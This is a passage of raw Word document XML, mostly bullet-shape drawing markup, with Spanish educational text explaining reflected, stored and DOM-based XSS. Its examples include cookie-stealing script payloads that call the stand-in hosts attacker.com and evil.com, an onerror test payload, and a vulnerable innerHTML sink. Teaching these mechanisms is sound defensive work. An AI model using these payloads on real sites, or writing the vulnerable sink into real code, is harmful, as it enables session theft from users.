                                  <a:pt x="21141" y="56421"/>
                                  <a:pt x="17640" y="54973"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="14139" y="53522"/>
                                  <a:pt x="11049" y="51457"/>
                                  <a:pt x="8369" y="48778"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="5690" y="46100"/>
                                  <a:pt x="3625" y="43011"/>
                                  <a:pt x="2175" y="39511"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="725" y="36010"/>
                                  <a:pt x="0" y="32364"/>
                                  <a:pt x="0" y="28575"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="0" y="24783"/>
                                  <a:pt x="725" y="21137"/>
                                  <a:pt x="2175" y="17636"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="3625" y="14139"/>
                                  <a:pt x="5690" y="11047"/>
                                  <a:pt x="8369" y="8368"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="11049" y="5686"/>
                                  <a:pt x="14139" y="3625"/>
                                  <a:pt x="17640" y="2177"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="21141" y="726"/>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B1B851" id="Group 5600"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">
                <v:shape id="Shape 288"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" path="m28575,v3789,,7434,726,10935,2177c43011,3625,46101,5686,48781,8368v2679,2679,4744,5771,6194,9268c56425,21137,57150,24783,57150,28575v,3789,-725,7435,-2175,10936c53525,43011,51460,46100,48781,48778v-2680,2679,-5770,4744,-9271,6195c36009,56421,32364,57150,28575,57150v-3789,,-7434,-729,-10935,-2177c14139,53522,11049,51457,8369,48778,5690,46100,3625,43011,2175,39511,725,36010,,32364,,28575,,24783,725,21137,2175,17636,3625,14139,5690,11047,8369,8368,11049,5686,14139,3625,17640,2177,21141,726,24786,,28575,xe" fillcolor="black" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,57150,57150"/>
                </v:shape>
                <w10:anchorlock/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="006F0019">
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> XSS Reflejado (Reflected XSS)</w:t>
      </w:r>
      <w:r w:rsidRPr="006F0019">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">: En este tipo de ataque, el script malicioso viaja como parte de la solicitud que el usuario envía al servidor, y es "reflejado" inmediatamente como parte de la respuesta HTML. </w:t>
      </w:r>
      <w:r>
        <w:t>El mecanismo funciona de la siguiente manera:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02E8C87F" w14:textId="77777777" w:rsidR="006F0019" w:rsidRPr="006F0019" w:rsidRDefault="006F0019" w:rsidP="006F0019">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="20" w:line="297" w:lineRule="auto"/>
        <w:ind w:right="12" w:hanging="236"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F0019">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>El atacante crea un enlace malicioso que contiene código JavaScript como parte de la URL (ej.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37606B8E" w14:textId="77777777" w:rsidR="006F0019" w:rsidRPr="006F0019" w:rsidRDefault="006F0019" w:rsidP="006F0019">
      <w:pPr>
        <w:spacing w:after="145" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="925"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F0019">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>https://example.com/search?q=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="090B0201" w14:textId="77777777" w:rsidR="006F0019" w:rsidRPr="006F0019" w:rsidRDefault="006F0019" w:rsidP="006F0019">
      <w:pPr>
        <w:spacing w:after="172" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="835"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F0019">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>&lt;script&gt;document.location='https://attacker.com/steal.php?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06589B8F" w14:textId="77777777" w:rsidR="006F0019" w:rsidRPr="00FE7389" w:rsidRDefault="006F0019" w:rsidP="006F0019">
      <w:pPr>
        <w:spacing w:after="172" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="835"/>
      </w:pPr>
      <w:r w:rsidRPr="00FE7389">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t xml:space="preserve">cookie='+document.cookie&lt;/script&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE7389">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10548376" w14:textId="77777777" w:rsidR="006F0019" w:rsidRPr="006F0019" w:rsidRDefault="006F0019" w:rsidP="006F0019">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="106" w:line="297" w:lineRule="auto"/>
        <w:ind w:right="12" w:hanging="236"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F0019">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Cuando la víctima hace clic en el enlace, el navegador envía la solicitud al servidor vulnerable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1543F66C" w14:textId="77777777" w:rsidR="006F0019" w:rsidRPr="006F0019" w:rsidRDefault="006F0019" w:rsidP="006F0019">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="106" w:line="297" w:lineRule="auto"/>
        <w:ind w:right="12" w:hanging="236"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F0019">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>El servidor incluye el valor del parámetro sin validar en la respuesta (lo "refleja")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B515BAF" w14:textId="77777777" w:rsidR="006F0019" w:rsidRPr="006F0019" w:rsidRDefault="006F0019" w:rsidP="006F0019">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="65" w:line="297" w:lineRule="auto"/>
        <w:ind w:right="12" w:hanging="236"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F0019">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>El navegador de la víctima ejecuta el script dentro del contexto de seguridad del sitio vulnerable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B37293C" w14:textId="77777777" w:rsidR="006F0019" w:rsidRPr="006F0019" w:rsidRDefault="006F0019" w:rsidP="006F0019">
      <w:pPr>
        <w:ind w:left="430" w:right="12"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F0019">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Un ejemplo típico es una página de búsqueda que muestra: "Resultados para: [término de búsqueda]" sin sanitizar el término. Si el término es código JavaScript, este se ejecutará.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E35A28F" w14:textId="77777777" w:rsidR="006F0019" w:rsidRDefault="006F0019" w:rsidP="006F0019">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="420" w:right="12" w:hanging="270"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7AE0EA08" wp14:editId="217F3CAE">
                <wp:extent cx="57150" cy="57150"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="5974" name="Group 5974"/>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362" name="Shape 362"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="57150" cy="57150"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="57150" h="57150">
                                <a:moveTo>
                                  <a:pt x="28575" y="0"/>
                                </a:moveTo>
                                <a:cubicBezTo>
                                  <a:pt x="32364" y="0"/>
                                  <a:pt x="36009" y="722"/>
                                  <a:pt x="39510" y="2170"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="43011" y="3621"/>
                                  <a:pt x="46101" y="5686"/>
                                  <a:pt x="48781" y="8365"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="51460" y="11044"/>
                                  <a:pt x="53525" y="14136"/>
                                  <a:pt x="54975" y="17633"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="56425" y="21137"/>
                                  <a:pt x="57150" y="24783"/>
                                  <a:pt x="57150" y="28575"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="57150" y="32364"/>
                                  <a:pt x="56425" y="36007"/>
                                  <a:pt x="54975" y="39508"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="53525" y="43008"/>
                                  <a:pt x="51460" y="46100"/>
                                  <a:pt x="48781" y="48782"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="46101" y="51460"/>
                                  <a:pt x="43011" y="53522"/>
                                  <a:pt x="39510" y="54970"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="36009" y="56421"/>
                                  <a:pt x="32364" y="57147"/>
                                  <a:pt x="28575" y="57150"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="24786" y="57147"/>
                                  <a:pt x="21141" y="56421"/>
                                  <a:pt x="17640" y="54970"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="14139" y="53522"/>
                                  <a:pt x="11049" y="51460"/>
                                  <a:pt x="8369" y="48782"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="5690" y="46100"/>
                                  <a:pt x="3625" y="43008"/>
                                  <a:pt x="2175" y="39508"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="725" y="36007"/>
                                  <a:pt x="0" y="32364"/>
                                  <a:pt x="0" y="28575"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="0" y="24783"/>
                                  <a:pt x="725" y="21137"/>
                                  <a:pt x="2175" y="17633"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="3625" y="14136"/>
                                  <a:pt x="5690" y="11044"/>
                                  <a:pt x="8369" y="8365"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="11049" y="5686"/>
                                  <a:pt x="14139" y="3621"/>
                                  <a:pt x="17640" y="2174"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="21141" y="722"/>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B22A01" id="Group 5974"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">
                <v:shape id="Shape 362"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" path="m28575,v3789,,7434,722,10935,2170c43011,3621,46101,5686,48781,8365v2679,2679,4744,5771,6194,9268c56425,21137,57150,24783,57150,28575v,3789,-725,7432,-2175,10933c53525,43008,51460,46100,48781,48782v-2680,2678,-5770,4740,-9271,6188c36009,56421,32364,57147,28575,57150v-3789,-3,-7434,-729,-10935,-2180c14139,53522,11049,51460,8369,48782,5690,46100,3625,43008,2175,39508,725,36007,,32364,,28575,,24783,725,21137,2175,17633,3625,14136,5690,11044,8369,8365,11049,5686,14139,3621,17640,2174,21141,722,24786,,28575,xe" fillcolor="black" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,57150,57150"/>
                </v:shape>
                <w10:anchorlock/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="006F0019">
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> XSS Almacenado (Stored XSS)</w:t>
      </w:r>
      <w:r w:rsidRPr="006F0019">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">: En este tipo, el código malicioso se almacena permanentemente en los recursos del servidor objetivo (como bases de datos, foros, campos de comentarios). </w:t>
      </w:r>
      <w:r>
        <w:t>El mecanismo opera así:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AAA37E4" w14:textId="77777777" w:rsidR="006F0019" w:rsidRPr="006F0019" w:rsidRDefault="006F0019" w:rsidP="006F0019">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="106" w:line="297" w:lineRule="auto"/>
        <w:ind w:right="12" w:hanging="236"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F0019">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">El atacante inserta el código malicioso a través de un campo vulnerable, como un formulario de comentarios ( </w:t>
      </w:r>
      <w:r w:rsidRPr="006F0019">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;script&gt;fetch('https://evil.com?cookie='+document.cookie)&lt;/script&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="006F0019">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F2F0E0E" w14:textId="77777777" w:rsidR="006F0019" w:rsidRPr="006F0019" w:rsidRDefault="006F0019" w:rsidP="006F0019">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="106" w:line="297" w:lineRule="auto"/>
        <w:ind w:right="12" w:hanging="236"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F0019">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>El servidor guarda el script malicioso en su base de datos sin validación adecuada</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B3AFBF6" w14:textId="77777777" w:rsidR="006F0019" w:rsidRPr="006F0019" w:rsidRDefault="006F0019" w:rsidP="006F0019">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="84" w:line="297" w:lineRule="auto"/>
        <w:ind w:right="12" w:hanging="236"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F0019">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Cuando otros usuarios visitan la página, el servidor entrega el contenido malicioso como parte legítima de la página</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50E0F424" w14:textId="77777777" w:rsidR="006F0019" w:rsidRPr="006F0019" w:rsidRDefault="006F0019" w:rsidP="006F0019">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="80" w:line="297" w:lineRule="auto"/>
        <w:ind w:right="12" w:hanging="236"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F0019">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>El navegador de cada víctima ejecuta el script como si fuera código confiable del sitio</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6102F8F2" w14:textId="77777777" w:rsidR="006F0019" w:rsidRPr="006F0019" w:rsidRDefault="006F0019" w:rsidP="006F0019">
      <w:pPr>
        <w:ind w:left="430" w:right="12"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F0019">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Este tipo es particularmente peligroso porque afecta a cualquier usuario que visite la página comprometida, sin necesidad de que interactúen con un enlace malicioso.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A153D05" w14:textId="77777777" w:rsidR="006F0019" w:rsidRDefault="006F0019" w:rsidP="006F0019">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="420" w:right="12" w:hanging="270"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="294797C9" wp14:editId="3A96B2D1">
                <wp:extent cx="57150" cy="57150"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="5976" name="Group 5976"/>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382" name="Shape 382"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="57150" cy="57150"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="57150" h="57150">
                                <a:moveTo>
                                  <a:pt x="28575" y="0"/>
                                </a:moveTo>
                                <a:cubicBezTo>
                                  <a:pt x="32364" y="0"/>
                                  <a:pt x="36009" y="722"/>
                                  <a:pt x="39510" y="2174"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="43011" y="3625"/>
                                  <a:pt x="46101" y="5690"/>
                                  <a:pt x="48781" y="8368"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="51460" y="11044"/>
                                  <a:pt x="53525" y="14136"/>
                                  <a:pt x="54975" y="17633"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="56425" y="21137"/>
                                  <a:pt x="57150" y="24783"/>
                                  <a:pt x="57150" y="28575"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="57150" y="32364"/>
                                  <a:pt x="56425" y="36007"/>
                                  <a:pt x="54975" y="39508"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="53525" y="43008"/>
                                  <a:pt x="51460" y="46096"/>
                                  <a:pt x="48781" y="48778"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="46101" y="51454"/>
                                  <a:pt x="43011" y="53519"/>
                                  <a:pt x="39510" y="54970"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="36009" y="56421"/>
                                  <a:pt x="32364" y="57147"/>
                                  <a:pt x="28575" y="57150"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="24786" y="57147"/>
                                  <a:pt x="21141" y="56421"/>
                                  <a:pt x="17640" y="54970"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="14139" y="53519"/>
                                  <a:pt x="11049" y="51454"/>
                                  <a:pt x="8369" y="48778"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="5690" y="46096"/>
                                  <a:pt x="3625" y="43008"/>
                                  <a:pt x="2175" y="39508"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="725" y="36007"/>
                                  <a:pt x="0" y="32364"/>
                                  <a:pt x="0" y="28575"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="0" y="24783"/>
                                  <a:pt x="725" y="21137"/>
                                  <a:pt x="2175" y="17633"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="3625" y="14136"/>
                                  <a:pt x="5690" y="11044"/>
                                  <a:pt x="8369" y="8368"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="11049" y="5690"/>
                                  <a:pt x="14139" y="3625"/>
                                  <a:pt x="17640" y="2174"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="21141" y="722"/>
                                  <a:pt x="24786" y="0"/>
                                  <a:pt x="2857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327B58" id="Group 5976"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">
                <v:shape id="Shape 382"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" path="m28575,v3789,,7434,722,10935,2174c43011,3625,46101,5690,48781,8368v2679,2676,4744,5768,6194,9265c56425,21137,57150,24783,57150,28575v,3789,-725,7432,-2175,10933c53525,43008,51460,46096,48781,48778v-2680,2676,-5770,4741,-9271,6192c36009,56421,32364,57147,28575,57150v-3789,-3,-7434,-729,-10935,-2180c14139,53519,11049,51454,8369,48778,5690,46096,3625,43008,2175,39508,725,36007,,32364,,28575,,24783,725,21137,2175,17633,3625,14136,5690,11044,8369,8368,11049,5690,14139,3625,17640,2174,21141,722,24786,,28575,xe" fillcolor="black" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="1" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,57150,57150"/>
                </v:shape>
                <w10:anchorlock/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="006F0019">
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> XSS basado en DOM (DOM-based XSS)</w:t>
      </w:r>
      <w:r w:rsidRPr="006F0019">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">: A diferencia de los anteriores, la vulnerabilidad existe completamente en el código del lado del cliente. </w:t>
      </w:r>
      <w:r>
        <w:t>Su mecanismo es el siguiente:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BD2D23E" w14:textId="77777777" w:rsidR="006F0019" w:rsidRPr="006F0019" w:rsidRDefault="006F0019" w:rsidP="006F0019">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="79" w:line="318" w:lineRule="auto"/>
        <w:ind w:right="12" w:hanging="236"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F0019">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">La aplicación web incluye JavaScript que manipula el DOM (Document Object Model) basándose en datos controlados por el usuario, como fragmentos de URL ( </w:t>
      </w:r>
      <w:r w:rsidRPr="006F0019">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">location.hash </w:t>
      </w:r>
      <w:r w:rsidRPr="006F0019">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">) o datos almacenados ( </w:t>
      </w:r>
      <w:r w:rsidRPr="006F0019">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">localStorage </w:t>
      </w:r>
      <w:r w:rsidRPr="006F0019">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51D85DCD" w14:textId="77777777" w:rsidR="006F0019" w:rsidRPr="006F0019" w:rsidRDefault="006F0019" w:rsidP="006F0019">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="106" w:line="297" w:lineRule="auto"/>
        <w:ind w:right="12" w:hanging="236"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F0019">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">El atacante proporciona entrada maliciosa en estos puntos (por ejemplo, </w:t>
      </w:r>
      <w:r w:rsidRPr="006F0019">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">https://example.com/page#&lt;img src=x onerror=alert(1)&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="006F0019">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74937409" w14:textId="77777777" w:rsidR="006F0019" w:rsidRPr="006F0019" w:rsidRDefault="006F0019" w:rsidP="006F0019">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="80" w:line="297" w:lineRule="auto"/>
        <w:ind w:right="12" w:hanging="236"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F0019">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>El código JavaScript legítimo de la página toma esta entrada y la inserta directamente en el DOM sin sanitización</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57D7730E" w14:textId="77777777" w:rsidR="006F0019" w:rsidRPr="006F0019" w:rsidRDefault="006F0019" w:rsidP="006F0019">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="106" w:line="297" w:lineRule="auto"/>
        <w:ind w:right="12" w:hanging="236"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F0019">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Al manipular el DOM, el código malicioso se ejecuta en el contexto de la página</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F65CE9A" w14:textId="77777777" w:rsidR="006F0019" w:rsidRPr="006F0019" w:rsidRDefault="006F0019" w:rsidP="006F0019">
      <w:pPr>
        <w:ind w:left="430" w:right="12"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F0019">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Por ejemplo, si una aplicación tiene código como </w:t>
      </w:r>
      <w:r w:rsidRPr="006F0019">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">document.getElementById("output").innerHTML = location.hash.substring(1) </w:t>
      </w:r>
      <w:r w:rsidRPr="006F0019">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>, un atacante puede explotar esto agregando código malicioso después del símbolo "#" en la URL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FB3E712" w14:textId="77777777" w:rsidR="006F0019" w:rsidRPr="006F0019" w:rsidRDefault="006F0019" w:rsidP="006F0019">
      <w:pPr>
        <w:spacing w:after="236"/>
        <w:ind w:right="12"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F0019">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>También existen variantes avanzadas de estos ataques, como:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33B4AAEE" w14:textId="77777777" w:rsidR="006F0019" w:rsidRPr="006F0019" w:rsidRDefault="006F0019" w:rsidP="006F0019">
      <w:pPr>
        <w:ind w:left="420" w:right="12" w:hanging="270"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
